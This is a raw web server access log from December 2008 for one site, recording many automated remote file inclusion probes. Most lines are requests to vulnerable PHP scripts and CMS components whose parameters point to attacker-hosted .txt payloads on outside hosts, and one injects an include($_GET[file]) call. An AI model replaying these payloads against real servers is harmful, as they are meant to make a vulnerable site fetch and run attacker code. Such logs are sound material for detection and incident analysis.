194.117.233.60 - - [08/Dec/2008:09:14:46 -0800] "GET /weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:14:47 -0800] "GET /logs//weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.206.124.42 - - [08/Dec/2008:09:14:53 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.124.42 - - [08/Dec/2008:09:14:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.124.42 - - [08/Dec/2008:09:14:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:15:07 -0800] "GET /logs/access_080320.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:15:07 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:15:07 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:15:07 -0800] "GET /logs/access_071229.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:15:09 -0800] "GET /modules/Forums/admin/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:15:09 -0800] "GET /logs//modules/Forums/admin/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:15:10 -0800] "GET /logs/access_081117.log//modules/Forums/admin/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
88.84.128.40 - - [08/Dec/2008:09:15:38 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
88.84.128.40 - - [08/Dec/2008:09:15:38 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
88.84.128.40 - - [08/Dec/2008:09:15:38 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:16:03 -0800] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:16:03 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:16:03 -0800] "GET /logs/phphtml.php?htmlclass_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:09:16:11 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:09:16:11 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:09:16:11 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:16:13 -0800] "GET /logs/access_080905.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
211.206.124.42 - - [08/Dec/2008:09:16:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.124.42 - - [08/Dec/2008:09:16:30 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.206.124.42 - - [08/Dec/2008:09:16:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:17:15 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:17:21 -0800] "GET /logs//weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:17:22 -0800] "GET /weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:17:22 -0800] "GET /logs/access_080912.log//weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:17:23 -0800] "GET /logs//weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:17:24 -0800] "GET /weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:18:05 -0800] "GET /logs/access_080919.log//modules/Forums/admin/errors.php?error=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
81.169.129.235 - - [08/Dec/2008:09:18:31 -0800] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
81.169.129.235 - - [08/Dec/2008:09:18:31 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
81.169.129.235 - - [08/Dec/2008:09:18:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
88.84.128.40 - - [08/Dec/2008:09:19:09 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:19:23 -0800] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:19:23 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:19:23 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.64.89.52 - - [08/Dec/2008:09:19:50 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:20:00 -0800] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:21:00 -0800] "GET /logs/access_080521.log//index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:21:00 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:21:01 -0800] "GET /logs/access_080504.log//index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:21:03 -0800] "GET /index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:21:16 -0800] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:21:22 -0800] "GET /logs/access_080523.log//index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:22:22 -0800] "GET /logs///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 77031 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:22:25 -0800] "GET //?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 94707 "-" "libwww-perl/5.810" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:22:30 -0800] "GET /logs/access_080615.log%20%20/phphtml.php?htmlclass_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:23:06 -0800] "GET /logs/access_080819.log%20%20/phphtml.php?htmlclass_path=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:23:17 -0800] "GET /logs/access_080905.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.13.180.43 - - [08/Dec/2008:09:23:45 -0800] "GET /logs/access_080401.log/errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:23:46 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.129.235 - - [08/Dec/2008:09:23:52 -0800] "GET /logs/access_080219.log//modules/vwar/admin/admin.php?vwar_root=http://forum.jj-nds-br.de/idf.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:09:24:47 -0800] "GET /logs/access_081114.log/modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:24:50 -0800] "GET /logs//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:24:50 -0800] "GET /xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:24:58 -0800] "GET /logs/access_080509.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:24:59 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:24:59 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:25:00 -0800] "GET /logs///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 77031 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:25:01 -0800] "GET //?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 94707 "-" "libwww-perl/5.810" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:25:25 -0800] "GET /logs/access_080513.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:25:36 -0800] "GET /logs/access_080425.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:26:17 -0800] "GET /logs/access_080530.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:26:45 -0800] "GET /logs/access_080905.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:27:14 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:27:45 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:27:46 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:28:00 -0800] "GET /logs/access_080309.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:28:00 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:28:01 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:28:06 -0800] "GET /errors.php?error=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:28:45 -0800] "GET /logs/access_080905.log//index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:29:14 -0800] "GET /logs/access_080216.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:29:17 -0800] "GET /logs/access_080726.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:29:18 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:29:18 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:09:30:22 -0800] "GET /logs/access_081114.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:09:30:38 -0800] "GET /logs/access_081114.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:30:53 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
64.76.23.179 - - [08/Dec/2008:09:31:12 -0800] "GET /logs/access_080919.log/errors.php?error=http://rubii.t35.com/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.23.179 - - [08/Dec/2008:09:31:12 -0800] "GET /errors.php?error=http://rubii.t35.com/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.23.179 - - [08/Dec/2008:09:31:13 -0800] "GET /logs/errors.php?error=http://rubii.t35.com/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:31:19 -0800] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:31:36 -0800] "GET /logs/access_080719.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:32:13 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:32:13 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:09:32:16 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:09:32:22 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:32:58 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:32:58 -0800] "GET /logs/access_071103.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:32:58 -0800] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.50 - - [08/Dec/2008:09:32:58 -0800] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://www.iesleonardodavinci.cat/blogger/nucleus/libs/idgn1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:33:05 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:33:05 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:11 -0800] "GET /conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:11 -0800] "GET /logs//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:11 -0800] "GET /logs/access_081014.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:11 -0800] "GET /logs/access_081031.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:12 -0800] "GET /conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:12 -0800] "GET /logs//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:12 -0800] "GET /logs/access_081014.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:12 -0800] "GET /logs/access_081031.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:33:16 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.13.180.43 - - [08/Dec/2008:09:33:38 -0800] "GET /logs/access_080511.log/errors.php?error=http://sior.org/zero/build/net.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:47 -0800] "GET /logs/access_081014.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:47 -0800] "GET /logs/access_081031.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.105.42 - - [08/Dec/2008:09:33:49 -0800] "GET /logs/access_081014.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
